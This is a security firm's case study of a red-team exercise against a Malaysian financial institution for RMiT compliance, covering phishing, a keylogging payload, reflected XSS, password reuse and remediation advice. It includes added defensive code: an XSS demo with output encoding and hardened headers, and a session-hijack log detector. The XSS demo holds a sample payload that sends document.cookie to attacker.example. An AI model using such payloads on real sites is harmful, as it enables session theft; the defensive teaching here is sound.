Behind the Simulated Breach: A Case Study on Red Teaming for RMiT Compliance

RMiT AASE Malaysia

Cyberattacks don’t announce themselves with flashing alarms. They slip in quietly, exploiting overlooked vulnerabilities, tricking employees into revealing credentials, and bypassing security controls that exist only in theory.

For financial institutions operating under Bank Negara Malaysia’s (BNM) Risk Management in Technology (RMiT) framework, the stakes are higher than ever. Compliance is mandatory, but real security requires more than just policies and checklists. It requires proof.

That was the reason behind this Red Teaming and Adversarial Attack Simulation Exercise (AASE). The institution needed to know whether its defenses could withstand a determined attacker, not in an artificial test environment but under conditions as close to a real-world cyberattack as possible. AKATI Sekurity was brought in not just to identify weaknesses but to think and act like an adversary—to find a way in, move undetected, and assess how prepared the organization really was.

The Test: A Controlled, Simulated Attack

Unlike a standard penetration test, which aims to find and validate as many vulnerabilities as possible within a defined scope, this Red Team engagement was about simulating a real attacker's behavior against a target objective and measuring how the defenders responded. The exercise mimicked the approach of an advanced threat actor, starting with reconnaissance, moving through exploitation, and attempting to escalate access—all while testing the organization's ability to detect, respond to, and contain the threat.

The attack unfolded in phases. It began with intelligence gathering, where publicly available information was scraped from employee directories, social media platforms, and even past data breaches on the dark web. A list of employees and their roles was compiled, along with email addresses and potential login credentials. With that information in hand, the team moved to targeted social engineering attempts. Carefully crafted phishing emails were sent to select employees, disguised as internal company communications. Another approach involved creating a fake LinkedIn profile of a job recruiter to engage with employees from HR and IT. The goal was simple—get someone to click, respond, or open a file.

The results were mixed. Some employees engaged with the phishing attempts, clicking on links and entering credentials on fraudulent login pages. Others ignored the emails or flagged them as suspicious, indicating a baseline level of awareness. A few went further and executed the payload attached to a phishing email, unknowingly giving the Red Team access to their systems. The payload, once executed, logged keystrokes, took screenshots, and exfiltrated session data in real time. From an attack perspective, it was a success. From a security perspective, it was a wake-up call.

But the test didn't stop at phishing. The Red Team searched for technical weaknesses in the institution's external-facing applications. Web applications were scanned for vulnerabilities, and it didn't take long to find them. A Reflected Cross-Site Scripting (XSS) vulnerability allowed attacker-supplied script to be echoed back in a legitimate company web page: any user who opened a crafted link would have that script executed in their browser, within the application's own origin, where it could read cookies not marked HttpOnly or drive the application on the user's behalf. That is what made it a session-hijacking opportunity. If exploited by a real attacker, this weakness could have granted access to user accounts without needing passwords.
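The reflected XSS finding described above, as an added example that is not code from the case study or from AKATI Sekurity: a search page that echoes the `q` parameter, shown first in its vulnerable form and then with output encoding at the sink, plus the response headers that limit what a successful injection can do (an HttpOnly session cookie that script cannot read) and that also stop the page from being framed, which is the clickjacking hardening mentioned later in the remediation roadmap. The route, cookie name, page layout and attacker payload are all assumptions constructed for the example.

```javascript
// Added example (not from the case study): reflected XSS, vulnerable vs. hardened.
// Route name, cookie name, page layout and attacker payload are assumptions.

// Minimal HTML entity encoding for text placed in an element body or a
// double-quoted attribute value. Not sufficient for JavaScript or URL contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// VULNERABLE: the query parameter lands in the page unchanged, so
// ?q=<script>...</script> runs in the victim's browser in the site's origin,
// with access to the DOM and to any cookie not marked HttpOnly.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// HARDENED: the same page with output encoding applied where the data meets HTML.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Headers a hardened response should carry. frame-ancestors 'none' (CSP) and
// X-Frame-Options: DENY prevent the page from being framed for clickjacking;
// the session cookie is HttpOnly so injected script cannot read it, Secure so
// it only travels over TLS, and SameSite=Strict so browsers withhold it on
// cross-site requests.
function hardenedHeaders(sessionId) {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Strict; Path=/`,
  };
}

// Demonstration check: does the rendered page contain a live <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed attacker input: a payload that would exfiltrate document.cookie
// if the session cookie were readable by script.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c="+document.cookie)</script>';

console.log("vulnerable page executes payload:", containsScriptTag(renderSearchVulnerable(PAYLOAD)));
console.log("hardened page executes payload:  ", containsScriptTag(renderSearchSafe(PAYLOAD)));
console.log(renderSearchSafe(PAYLOAD));
console.log(hardenedHeaders("abc123"));
```

Encoding is context-specific: `escapeHtml` is correct for element bodies and quoted attributes, but data placed inside a `<script>` block, an event handler or a URL needs the encoder for that context. The headers do not fix the injection; they reduce the blast radius if one is missed.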

Beyond external threats, the simulation explored privilege escalation within the network. The team tested compromised credentials, searching for weak internal controls that would allow lateral movement across systems. In some cases, users were found to be reusing the same password across multiple platforms, so a single captured password could unlock other systems, allowing an attacker to pivot from a low-level account to more sensitive areas of the network. The security monitoring tools caught some of these attempts, but not all of them.

What the Attack Revealed

The exercise confirmed what many organizations fear but don’t always test—there were gaps. Employees were falling for phishing attempts, proving that security awareness training alone wasn’t enough. Web applications had exploitable vulnerabilities, meaning an attacker could gain access through technical means if they weren’t stopped in time. More concerning was the discovery that not all security alerts triggered immediate action. While some attacks were blocked, others went unnoticed for longer than they should have.

There were strengths, too. Certain defenses worked as intended, particularly multi-factor authentication (MFA) on high-privilege accounts, which stopped some escalation attempts in their tracks. The endpoint security system successfully detected and blocked parts of the attack, preventing full compromise. But relying on security tools alone was risky. Attackers don’t follow rules, and neither did the Red Team. They re-engineered payloads, modified attack methods, and exploited human error—just as a real-world threat actor would.

The Road Ahead: Fixing the Gaps Before an Actual Attack

AKATI Sekurity didn’t just deliver a report; it provided a clear roadmap for improvement. The organization needed to tighten web application security, closing vulnerabilities that allowed XSS and clickjacking attacks. Employee training programs needed a stronger emphasis on recognizing social engineering tactics, not just generic cybersecurity awareness. Security monitoring tools had to be fine-tuned to detect more advanced attack techniques, particularly those involving session hijacking and privilege escalation attempts.
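One concrete form the "detect session hijacking" tuning in the roadmap above can take, as an added example that is not part of the case study or AKATI Sekurity's tooling: a detector that flags a session token being presented from a different source address or User-Agent than the one it was issued to, which is the observable side effect of a cookie stolen through XSS or a phishing payload. The `key=value` log format, field names and the sample lines are constructed assumptions for the example.

```javascript
// Added example (not from the case study): session-hijack detection over
// constructed request logs. The log format and field names are assumptions.

// Constructed sample: alice logs in, browses normally, then her session id is
// replayed from a different address and client; bob is a normal user.
const SAMPLE_LOG = `
ts=2024-03-01T08:00:01Z event=login user=alice session=s1 ip=10.1.1.5 ua=Firefox/124
ts=2024-03-01T08:05:12Z event=request user=alice session=s1 ip=10.1.1.5 ua=Firefox/124 path=/accounts
ts=2024-03-01T08:06:40Z event=request user=alice session=s1 ip=203.0.113.9 ua=curl/8.5 path=/transfer
ts=2024-03-01T08:07:02Z event=login user=bob session=s2 ip=10.1.1.9 ua=Chrome/122
ts=2024-03-01T08:09:30Z event=request user=bob session=s2 ip=10.1.1.9 ua=Chrome/122 path=/profile
ts=2024-03-01T08:10:15Z event=request user=eve session=s9 ip=198.51.100.7 ua=curl/8.5 path=/admin
`.trim();

// Parse one "key=value key=value" line into an object.
function parseLine(line) {
  const rec = {};
  for (const tok of line.split(/\s+/)) {
    const i = tok.indexOf("=");
    if (i > 0) rec[tok.slice(0, i)] = tok.slice(i + 1);
  }
  return rec;
}

// Record ip/ua at login per session, then alert on any later request for that
// session where either attribute changed, or where the session id was never
// seen being issued at all (a token minted or guessed outside the login flow).
function detectSessionHijack(logText) {
  const baseline = new Map(); // session id -> { ip, ua, user }
  const alerts = [];
  for (const raw of logText.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    const r = parseLine(line);
    if (r.event === "login") {
      baseline.set(r.session, { ip: r.ip, ua: r.ua, user: r.user });
      continue;
    }
    const b = baseline.get(r.session);
    if (!b) {
      alerts.push({ ts: r.ts, session: r.session, user: r.user, path: r.path,
                    reason: "session with no observed login" });
      continue;
    }
    const reasons = [];
    if (r.ip !== b.ip) reasons.push(`ip ${b.ip} -> ${r.ip}`);
    if (r.ua !== b.ua) reasons.push(`ua ${b.ua} -> ${r.ua}`);
    if (reasons.length) {
      alerts.push({ ts: r.ts, session: r.session, user: b.user, path: r.path,
                    reason: reasons.join("; ") });
    }
  }
  return alerts;
}

for (const a of detectSessionHijack(SAMPLE_LOG)) console.log(a);
```

In production this rule needs tuning before it goes to the SOC: corporate NAT, mobile clients that change address mid-session and browser auto-updates all shift `ip` or `ua` legitimately, so a change of both attributes at once, or a change coinciding with a sensitive path such as a funds transfer, is a far stronger signal than either alone. Binding the session to a client-side attribute the attacker cannot replay, such as a TLS-bound token, is the preventive counterpart to this detection.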

The institution also had to reconsider its third-party security oversight. Vendor agreements were found to be missing crucial security clauses, meaning external service providers weren’t being held to the same security standards. That was an unnecessary risk, one that could be exploited by attackers targeting the weakest link in the supply chain.

Ultimately, the exercise reinforced a simple but critical truth: compliance isn’t the same as security. Meeting regulatory requirements is necessary, but real resilience comes from continuous testing, adaptation, and a proactive approach to cybersecurity.

Final Thoughts: A Test That Could Prevent the Real Thing

For many organizations, cybersecurity remains an abstract concept until something goes wrong. A Red Teaming exercise like this one eliminates that uncertainty. It forces companies to confront their weaknesses before an actual attacker does. It’s not just about uncovering vulnerabilities—it’s about proving, without question, whether security defenses can hold up under pressure.

This financial institution now has that proof. They know where they stand, what worked, and what didn’t. More importantly, they have a plan to fix the gaps, strengthen their defenses, and ensure that the next attack—whether simulated or real—won’t succeed.


AKATI Sekurity specializes in real-world adversarial simulations, stress-testing security defenses, and helping organizations move beyond compliance to true cyber resilience. If you want to know how your defenses hold up against modern attackers, we’re ready to put them to the test.

